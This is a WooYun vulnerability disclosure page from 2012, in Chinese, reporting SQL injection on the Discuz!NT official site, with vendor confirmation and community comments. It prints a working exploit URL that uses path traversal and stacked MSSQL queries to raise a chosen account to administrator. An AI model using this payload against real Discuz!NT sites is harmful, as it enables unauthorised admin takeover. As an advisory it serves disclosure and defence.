DNT官网存在SQL注入漏洞 | wooyun-2012-04477| WooYun.org

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2012-04477

漏洞标题：DNT官网存在SQL注入漏洞

漏洞作者： Jannock

提交时间：2012-02-13 20:45

修复时间：2012-03-29 20:46

公开时间：2012-03-29 20:46

漏洞类型：SQL注射漏洞

危害等级：中

自评Rank：10

漏洞状态：厂商已经确认

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

2012-02-13：细节已通知厂商并且等待厂商处理中
2012-02-18：厂商已经确认，细节仅向厂商公开
2012-02-28：细节向核心白帽子及相关领域专家公开
2012-03-09：细节向普通白帽子公开
2012-03-19：细节向实习白帽子公开
2012-03-29：细节向公众公开

简要描述：

DNT官网存在SQL注入漏洞，Powered by Discuz!NT 3.9.913 Beta

详细说明：

本来是测试凡客（ WooYun: 凡客诚品某频道再暴SQL注入漏洞），但发现官方也存在。
注入地址：
http://nt.discuz.net/space/manage/ajax.aspx?AjaxTemplate=../../admin/usercontrols/ajaxtopicinfo.ascx&poster=1
利用：
http://nt.discuz.net/space/manage/ajax.aspx?AjaxTemplate=../../admin/usercontrols/ajaxtopicinfo.ascx&poster=1%27%29;declare%20@t%20nvarchar%2840%29%20select%20@t=%28select%20top%201%20name%20from%20sysobjects%20where%20name%20like%27%_users%27%20and%20xtype=%27U%27%29%20exec%28%27update%20%27%2b@t%2b%27%20set%20groupid=1%20where%20username=%27%27xxxxx%27%27%27%29--
Shell 已经删除

漏洞证明：

修复方案：

应该懂得！

版权声明：转载请注明来源 Jannock@乌云

漏洞回应

厂商回应：

危害等级：高

漏洞Rank：20

确认时间：2012-02-18 20:46

厂商回复：

非常感谢！

漏洞评价：

2012-02-14 18:40 | piaoye ( 普通白帽子 | Rank:343 漏洞数:53 | ww)

Powered by Discuz!NT 3.9.913 Beta... 赶潮流，贝塔版都先用上了
2012-02-18 09:35 | Frankie ( 路人 | Rank:10 漏洞数:1 | 你存在,我的代码里...Line 0://你)

DZ 0day看来真出来了..地下黑市流传中,听说......大家有木有?
2012-02-18 21:12 | 疯狂 ( 普通白帽子 | Rank:239 漏洞数:30 | 桃李春风一杯酒莲湖夜雨八年灯)

我晕，这要秒杀掉多少站
2012-02-19 11:05 | yeweit6 ( 实习白帽子 | Rank:32 漏洞数:7 | 豫章故郡，洪都新府。星分翼轸，地接衡庐。...)

为嘛忽略了
2012-02-19 11:55 | 冰锋刺客 ( 普通白帽子 | Rank:113 漏洞数:14 | 请在监护人陪同下与本人交流)

咋就这样忽略了哇。@Frankie 求0day ,哈哈
2012-02-19 13:49 | 无敌L.t.H ( 路人 | Rank:21 漏洞数:4 | ‮……肉肉捉活，亭长放解)

DNT官方就是试验品啊。
2012-02-20 09:02 | pangshenjie ( 普通白帽子 | Rank:110 漏洞数:14 )

官方正在修补吧
2012-02-20 09:36 | king ( 路人 | Rank:15 漏洞数:2 | 喜爱安全，网络游戏安全应用漏洞挖掘)

话说dz有些漏洞本来没有的，在新版本中又会加些漏洞进来，悲剧的程序员
2012-02-20 17:05 | Frankie ( 路人 | Rank:10 漏洞数:1 | 你存在,我的代码里...Line 0://你)

@冰锋刺客木有.只是听说流传了...黑市..那价格..不是专业做这块的,保持兴趣围观下而已...
2012-02-20 18:44 | horseluke ( 普通白帽子 | Rank:116 漏洞数:18 | Realize the dream in earnest.)

@king ，欢迎关注Discuz!X 2.5和phpwind 9两个均在大改重写代码的论坛程序。但作为使用这两套程序的人真心不想有0day，55555......
2012-03-29 23:08 | _Evil ( 普通白帽子 | Rank:418 漏洞数:59 | 万事无他,唯手熟尔。农民也会编程,别指望天...)

0day 0.0
2012-03-30 09:25 | teamtopkarl ( 实习白帽子 | Rank:48 漏洞数:7 | 对网络安全事业一直保持着激情)

幸存的没DNTRequest的

WooYun.org

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2012-04477

漏洞标题：DNT官网存在SQL注入漏洞

相关厂商：Discuz!

漏洞作者： Jannock

提交时间：2012-02-13 20:45

修复时间：2012-03-29 20:46

公开时间：2012-03-29 20:46

漏洞类型：SQL注射漏洞

危害等级：中

自评Rank：10

漏洞状态：厂商已经确认

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源 Jannock@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

漏洞评价：

评论

WooYun.org

漏洞概要 关注数(24) 关注此漏洞

缺陷编号：wooyun-2012-04477

漏洞标题：DNT官网存在SQL注入漏洞

相关厂商：Discuz!

漏洞作者： Jannock

提交时间：2012-02-13 20:45

修复时间：2012-03-29 20:46

公开时间：2012-03-29 20:46

漏洞类型：SQL注射漏洞

危害等级：中

自评Rank：10

漏洞状态：厂商已经确认

Tags标签： 无

4人收藏 收藏 var token=""; var id="wooyun-2012-04477"; $(".btn-fav").click(function(){ CollectBug(id,token); }); 分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源 Jannock@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

漏洞评价：

评论

漏洞概要关注数(24) 关注此漏洞

Tags标签：无

4人收藏收藏
分享漏洞：